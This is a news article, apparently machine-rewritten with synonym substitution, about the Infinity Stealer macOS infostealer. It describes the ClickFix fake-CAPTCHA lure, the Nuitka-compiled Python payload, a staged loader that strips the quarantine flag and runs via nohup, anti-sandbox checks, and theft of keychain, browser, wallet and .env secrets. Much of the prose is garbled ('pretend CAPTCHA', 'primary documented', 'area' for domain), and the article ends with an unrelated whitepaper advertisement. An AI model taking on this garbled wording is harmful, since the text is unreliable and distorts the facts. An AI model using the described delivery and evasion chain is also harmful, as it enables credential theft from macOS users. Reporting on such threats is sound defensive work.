A brand new info-stealing malware named Infinity Stealer is focusing on macOS methods with a Python payload packaged as an executable utilizing the open-source Nuitka compiler.
The assault makes use of the ClickFix approach, presenting a pretend CAPTCHA that mimics Cloudflare’s human verification test to trick customers into executing malicious code.
Researchers at Malwarebytes say that is the primary documented macOS marketing campaign combining ClickFix supply with a Python-based infostealer compiled utilizing Nuitka.
As a result of Nuitka produces a local binary by compiling the Python script into C code, the ensuing executable is extra immune to static evaluation.
In comparison with PyInstaller, which bundles Python with bytecode, it’s extra evasive as a result of it produces an actual native binary with no apparent bytecode layer, making reverse engineering a lot tougher.
“The ultimate payload is written in Python and compiled with Nuitka, producing a local macOS binary. That makes it tougher to investigate and detect than typical Python-based malware,” Malwarebystes says.
Assault chain
The assault begins with a ClickFix lure on the area update-check[.]com, posing as a human verification step from Cloudflare and asking the consumer to finish the problem by pasting a base64-obfuscated curl command into the macOS Terminal, bypassing OS-level defenses.
.jpg)
Supply: Malwarebytes
The command decodes a Bash script that writes the stage-2 (Nuitka loader) to /tmp, then removes the quarantine flag, and executes it by way of ‘nohup.’ Lastly, it passes the command-and-control (C2) and token by way of surroundings variables after which deletes itself and closes the Terminal window.
The Nuitka loader is an 8.6 MB Mach-O binary that comprises a 35MB zstd-compressed archive, containing the stage-3 (UpdateHelper.bin), which is the Infinity Stealer malware.
.jpg)
Supply: Malwarebytes
Earlier than beginning to acquire delicate knowledge, the malware performs anti-analysis checks to find out whether or not it’s operating in a virtualized/sandboxed surroundings.
Malwarebytes’ evaluation of the Python 3.11 payload uncovered that the info-stealer can take screenshots and harvest the next knowledge:
- Credentials from Chromium‑based mostly browsers and Firefox
- macOS Keychain entries
- Cryptocurrency wallets
- Plaintext secrets and techniques in developer information, reminiscent of .env
All stolen knowledge is exfiltrated by way of HTTP POST requests to the C2, and a Telegram notification is shipped to the risk actors upon completion of the operation.
Malwarebytes underlines that the looks of malware like Infinity Stealer is proof that threats to macOS customers are solely getting extra superior and focused.
Customers ought to by no means paste into Terminal instructions they discover on-line and don’t totally perceive.
Automated pentesting proves the trail exists. BAS proves whether or not your controls cease it. Most groups run one with out the opposite.
This whitepaper maps six validation surfaces, exhibits the place protection ends, and supplies practitioners with three diagnostic questions for any device analysis.
